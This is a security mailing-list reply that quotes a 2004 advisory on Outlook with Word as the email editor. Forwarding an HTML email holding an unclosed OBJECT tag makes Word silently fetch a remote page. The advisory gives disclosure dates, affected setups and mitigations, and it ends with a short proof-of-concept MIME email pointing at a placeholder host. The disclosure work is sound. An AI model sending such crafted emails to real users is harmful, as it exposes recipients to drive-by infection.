<<< Date Index >>>     <<< Thread Index >>>

RE: Microsoft Word Email Object Data Vulnerability



How did you find this? Did someone email this to you? Did
you discover this variation? 

(Being that the original bug was mine, I have some interest
in a new variation being exploited by spammers... especially
if it was genuinely found in the wild.)

And, why is Microsoft ignoring this bug? If you forward
the email it will work (with Word as the editor...)? Yes, 
that may not be a critical variation, but with proper social 
engineering, it would fool some people... especially the 
many who love to forward things such as "Bill Gates will 
buy you a new cell phone if you forward this email"...



> -----Original Message-----
> From: James C. Slora, Jr. [mailto:james.slora@xxxxxxxx] 
> Sent: Thursday, July 08, 2004 12:52 PM
> To: bugtraq@xxxxxxxxxxxxxxxxx; Windows NTBugtraq Mailing List
> Subject: Microsoft Word Email Object Data Vulnerability
> 
> ==============================================
> Microsoft Word Email Object Data Vulnerability
> ==============================================
> 
> 
> ==============================================
> Summary:
> ==============================================
> Outlook 2000 and 2003 allow execution of remote web pages specified
> within the data property of OBJECT tags when there is no 
> closing /OBJECT
> tag, while forwarding an HTML email message using Word 2000 or 2003 as
> the email editor. This behavior happens regardless of Security Zone
> settings - it completely ignores them.
> 
> Spammed exploits are very much in the wild and are affecting systems
> even if the bug is beyond the scope of the spammers' original intent. 
> 
> ==============================================
> Vendor notification: 
> ==============================================
> June 8 - email to secure@xxxxxxxxxxxxx (no response)
> June 14 - email again to secure@xxxxxxxxxxxxx, initial response came
> same day
> June 15 through July 2 - Several messages back and forth
> July 2 - final and detailed response from Microsoft
> Result: They consider it a variation of web bug behavior, and may take
> care of it in future Office releases if they decide to modify 
> Outlook's
> download behavior when forwarding and replying.
>  
> **********************
> Disclaimer: Testing was very limited. There are probably mistakes and
> holes in my analysis, and this all needs to be reviewed 
> further. Use at
> your own risk, no liability for misuse, etc.
> **********************
> 
> ==============================================
> Severity: 
> ==============================================
> I consider it at least moderate because large volumes of spam easily
> overcome long odds of exploiting it in any given case. Plus 
> because many
> people believe they are immune to old-fashioned OBJECT data 
> exploits if
> they are up to date on their patches. Plus the apparent Security Zone
> bypass side of it may indicate additional more serious risks in Word
> email.
> 
> ==============================================
> Products tested
> ==============================================
> Affected:
> Outlook 2003 with MS Word 2003 as the email editor on XP Pro SP1
> Outlook 2000 with MS Word 2000 as the email editor on Win2K Pro SP4
> 
> Not affected:
> Outlook 2003 with its own email editor on XP Pro SP1 
> Outlook 2000 with its own email editor on Win2K Pro SP4
> 
> Not tested:
> No other configurations tested.
> 
> ==============================================
> Details:
> ==============================================
> The OBJECT tag gets processed on any version of Outlook but blocks
> ActiveX controls if it is up to patch rev (anything since 2000) with
> default Restricted Zone settings. This is working fine on the affected
> system until one specific scenario:
> 
> When using MS Word as the email editor and forwarding an HTML email
> message containing an OBJECT tag with no closing /OBJECT, MS Word
> downloads the page referred to in the "data" property of the 
> OBJECT with
> no prompt to the user.
> 
> So if the user forwards a spam message to someone (such as their mail
> administrator), the user may infect their own computer.
> 
> This only works when forwarding a message - not when replying. It also
> only appears to work if the OBJECT tag is not closed with a /OBJECT.
> 
> ==============================================
> Fix:
> ==============================================
> None available AFAIK
> 
> ==============================================
> Mitigators:
> ==============================================
> - Don't use Word as the email editor
> - Don't forward spam messages, just forward headers or source from
> Tools>Options
> - Filter HTML mail containing OBJECT tags, whether enclosed 
> by HTML tags
> or not, and especially if there is no closing /OBJECT
> 
> Those mitigators stop the execution of the OBJECT data reference
> 
> Frequently suggested mitigators that do not help so much:
> - Removing the HTA MIME-Type, and killbitting the adodb.stream and
> shell.application controls, do not help.
> - Outlook Restricted Zone settings do not help.
> - Locking down the My Computer security zone does not help.
> 
> Those mitigators don't stop execution but may help stop secondary
> exploits that might be hosted at the OBJECT data reference.
> 
> ==============================================
> Proof of concept:
> ==============================================
> Check your spam for OBJECT tags that call Web URLs. This stuff is
> everywhere. Here is the basic idea:
> 
> MIME-Version: 1.0
> Content-Type: multipart/alternative;
>       boundary="--001"
> 
> ----001
> Content-Type: text/html;
> Content-Transfer-Encoding: quoted-printable
> 
> |object data=3D"http://www.foobar.foo/page.php";|
> 
> ----001--
> 
> 
>